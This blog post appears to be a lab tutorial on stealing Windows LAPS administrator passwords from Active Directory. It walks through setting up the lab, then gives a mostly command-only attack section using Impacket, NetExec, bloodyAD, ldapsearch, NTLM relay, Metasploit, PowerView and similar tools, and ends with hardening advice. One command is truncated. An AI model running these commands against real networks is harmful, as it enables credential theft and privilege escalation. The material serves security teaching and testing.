Credential Dumping:LAPS

at 1:14 AM Sunday, May 31, 2020

Introduction:

Active Directory (AD) is a critical component of enterprise networks, and ensuring its security is paramount for protecting sensitive data and maintaining system integrity. The Local Administrator Password Solution (LAPS) is a Microsoft feature that manages local administrator passwords for domain-joined computers. While LAPS enhances security by randomizing and managing these passwords, improper configuration or excessive permissions can lead to significant vulnerabilities. Attackers can exploit these weaknesses to retrieve LAPS passwords, gain administrative access to systems, and escalate privileges within the domain.

This guide provides a detailed walkthrough of how attackers can exploit LAPS vulnerabilities using tools like Active Directory Explorer (AD Explorer) and PowerView. We’ll cover the steps, commands, and techniques used to retrieve LAPS passwords, along with best practices to mitigate these risks.

 

Contents:

  • Understanding LAPS and Its Vulnerabilities
  • Lab setup
  • Tools for Exploiting LAPS
  • Step-by-Step Exploitation of LAPS
    • Retrieving LAPS Passwords with Impacket using bloodhound
    • NetExec
    • pyLAPS
    • LAPSDumper
    • bloodyAD
    • LDAP queries
    • NTLM Relay
    • ldap_shell
    • Get-LAPSPassword
    • NetTools
    • Metasploit
    • Powerview
    • AD Explorer
  • Security Implications of LAPS Exploitation
  • Best Practices for Securing LAPS
  • Conclusion

Understanding LAPS and Its Vulnerabilities

What is LAPS?

LAPS is a Microsoft solution that automatically manages and rotates local administrator passwords for domain-joined computers. The passwords are stored in Active Directory attributes:

  • ms-Mcs-AdmPwd: Stores the LAPS password.
  • ms-Mcs-AdmPwdExpirationTime: Stores the password expiration time.

Common Misconfigurations

  • Excessive permissions granted to users or groups to read LAPS passwords.
  • Lack of monitoring and auditing of LAPS-related permissions.
  • Failure to restrict access to sensitive AD attributes.

 

How Attackers Exploit LAPS

Attackers with sufficient permissions can retrieve LAPS passwords, gain administrative access to computers, and escalate privileges within the domain.

Lab Setup

Step 1: Create a New Organizational Unit (OU)

1.     In the ADUC console, expand the domain (e.g., ignite.local) in the left pane.

2.     Right-click on the domain or an existing OU where you want to create the new OU.

3.     Select New > Organizational Unit.



In the New Object - Organizational Unit window:

Enter a name for the OU (e.g., Tech).



Step 2: Verify the New OU

1.     In the ADUC console, navigate to the location where you created the OU.

2.     Ensure the new OU (e.g., Tech) is visible in the list.

Step 3: Add a Computer to the New OU

1.     In the ADUC console, navigate to the Computers container (or the OU where the computer object currently resides).

2.     Locate the computer object you want to move (e.g., MSEDGEWIN10).



Step 4: Configure LAPS:

Download and install the LAPS software on the Domain Controller.



 

Configure LAPS Group Policy:

Open Group Policy Management and create a new GPO.



 

Navigate to Cmputer Configuration > Policies > Administrative Templates > LAPS.



Enable Enable local admin password management and configure password settings.


Ensure the LAPS GPO is applied to the client machine.




Check that the local administrator password is managed by LAPS.

Step 6: Configuring LAPS Setup Options

1.      Run the LAPS installer and proceed to the Custom Setup screen.

2.      Select components like the AdminPwd GPO Extension and Management Tools.

3.      Complete the installation.

Step 7: Updating the AD Schema for LAPS

Open PowerShell and import the AdmPwd.PS module:

Import-Module AdmPwd.PS

Update the AD schema:

Update-AdmPwdADSchema

Delegate permissions to an OU:

Set-AdmPwdComputerSelfPermission -OrgUnit Tech

Step 8: Managing Group Policy Objects (GPOs)

Configuring LAPS Setup

  1. Open the Group Policy Management Console (GPMC).
  2. Navigate to Computer Configuration > Policies > Administrative Templates > LAPS.
  3. Enable settings for local admin password management.

Setting Password Complexity and Expiration

Navigate to LAPS > Password Settings in the GPO editor.

Define password complexity, length, and expiration policies.

Step 9: Viewing and Managing LAPS Passwords

Retrieving LAPS Password Attributes

In ADUC, locate the computer object (e.g., MSEDGEWIN10).

Open the Properties window and view the Attribute Editor tab.

Check attributes like ms-Mcs-AdmPwd and ms-Mcs-AdmPwdExpirationTime.

Step 10: Advanced Security and Permissions Management

Reviewing Security Permissions

Open the Properties window of a computer object.

Navigate to the Security tab and review assigned permissions.

Configuring Permission Entries

Access the Advanced Security Settings window for a computer object.

Add, edit, or remove permission entries as required.

Tools for Exploiting LAPS

Tools Overview

  • Impacket scripts: A Python library for crafting and manipulating network protocols to perform tasks like SMB and NTLM attacks.
  • Bloodhound: A graphical tool used to map and analyze Active Directory relationships and attack paths to identify potential privilege escalation and lateral movement opportunities.
  • NetExec: A tool for executing remote commands on Windows systems using SMB or RPC.
  • pyLAPS: A Python-based tool for querying and retrieving LAPS-managed passwords from Active Directory.
  • LAPSDumper: A script designed to extract LAPS passwords from Active Directory securely.
  • bloodyAD A powerful tool for automating Active Directory attacks and gathering information, including LAPS attributes.
  • ldapsearch A command-line utility for querying LDAP directories and extracting specific attributes, such as LAPS passwords.
  • ldap_shell: An interactive shell for executing LDAP queries and managing directory objects
  • Get-LAPSPassword: A PowerShell script to retrieve LAPS-managed passwords from Active Directory securely.
  • NetTools: A comprehensive toolkit for managing and querying network and Active Directory resources.
  • SharpLAPS: A C#-based tool for retrieving LAPS passwords using secure credentials.
  • Metasploit: A penetration testing framework with modules for querying and exploiting Active Directory, including LAPS.
  • Powerview: A PowerShell module for Active Directory enumeration and privilege escalation activities.
  • AD Explorer: A graphical tool for exploring and managing Active Directory structures and attributes interactively.

Step-by-Step Exploitation of LAPS

·       Retrieving LAPS Passwords with Impacket using bloodhound

Ingest AD data into BloodHound.

bloodhound-python -u raj -p Password@1 -ns 192.168.1.48 -d ignite.local -c All

Search for the computer object (MSEDGEWIN10).

 

Identify attack command  to escalate privileges using the retrieved LAPS password.

Using Impacket module, enumerate LAPS password:

 

impacket-GetLAPSPassword ignite.local/raj:Password@1 -dc-ip 192.168.1.48

 

Netexec

nxc ldap "192.168.1.48" -d "ignite.local" -u "raj" -p "Password@1" --module laps

pyLAPS

git clone https://github.com/p0dalirius/pyLAPS

./pyLAPS.py --action get -d "192.168.1.48" -u "raj" -p "Password@1"

LAPSDumper

https://github.com/n00py/LAPSDumper

python laps.py -u 'raj' -p 'Password@1' -d 'ignite.local'

bloodyAD

bloodyAD --host "192.168.1.48" -d "ignite.local" -u "raj" -p "Password@1" get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime

LDAP queries

ldapsearch -x -H ldap://192.168.1.48 -D "raj@ignite.local" -w "Password@1" -b "dc=ignite,dc=local" "(&(objectCategory=computer)(ms-MCS-AdmPwd=*))" ms-MCS-AdmP

There is a Metasploit module available through which we can dump the LAPS password.

msf6 > use auxiliary/gather/ldap_query

set rhosts 192.168.1.48

set username raj

set password Password@1

set domain ignite.local

set action ENUM_LAPS_PASSWORDS

run

NTLM Relay

impacket-ntlmrelayx -t ldaps://192.168.1.48 -debug --dump-laps --no-dump --no-da --no-acl --no-validate-privs

ldap_shell

git clone https://github.com/PShlyundin/ldap_shell.git

cd ldap_shell

python3 -m pip install .

ldap_shell ignite.local/raj: Password@1 -dc-ip 192.168.1.48

Get-LAPSPasswords

Powershell -p bypass

Import-Module ./Get-LAPSPasswords.ps1

Get-LAPSPasswords -DomainController 192.168.1.48 -Credential IGNITE\raj | Format-Table -AutoSize

NetTools

Retrieving LAPS Passwords with SharpLAPS

SharpLAPS.exe /user:IGNITE\raj /pass:Password@1 /host:192.168.1.48

 

Metasploit

use post/windows/gather/credentials/enum_laps

set session 1

run

PowerView

Import-Module .\PowerView.ps1

Get-DomainComputer -Identity MSEDGEWIN10 -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime

 

AD Explorer

Open AD Explorer and connect to the domain controller.

 

Navigate to the computer object (CN=MSEDGEWIN10,OU=Tech,DC=ignite,DC=local).

 

View LAPS attributes:

·       ms-Mcs-AdmPwd: /[ezL6hb0w9INQ]

·       ms-Mcs-AdmPwdExpirationTime: 1/21/2025 9:37:18 AM

 

Security Implications of LAPS Exploitation

Risks of LAPS Password Exposure

·       Attackers can gain administrative access to domain-joined computers.

·       Privilege escalation within the domain becomes possible.

·       Sensitive data and systems are at risk of compromise.

 

Real-World Attack Scenarios

·        Attackers use LAPS passwords to move laterally across the network.

·        Compromised computers are used to escalate privileges to domain admin.

Best Practices for Securing LAPS

Restricting Access to LAPS Passwords

Use the Set-AdmPwdReadPasswordPermission cmdlet to restrict access:

Set-AdmPwdReadPasswordPermission -Identity "Tech" -AllowedPrincipals "Domain Admins"

   

Implementing Least Privilege

·        Grant LAPS access only to trusted users and groups.

·        Regularly review and update permissions.

 

Monitoring and Auditing AD Permissions

·        Use tools like BloodHound to identify and remediate attack paths.

·        Enable auditing for LAPS-related activities.

 

Conclusion

 

LAPS is a powerful tool for managing local administrator passwords, but misconfigurations can lead to significant security risks. By understanding how attackers exploit LAPS and implementing best practices, organizations can secure their Active Directory environments and prevent privilege escalation attacks.

 

 

 







Labels:

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)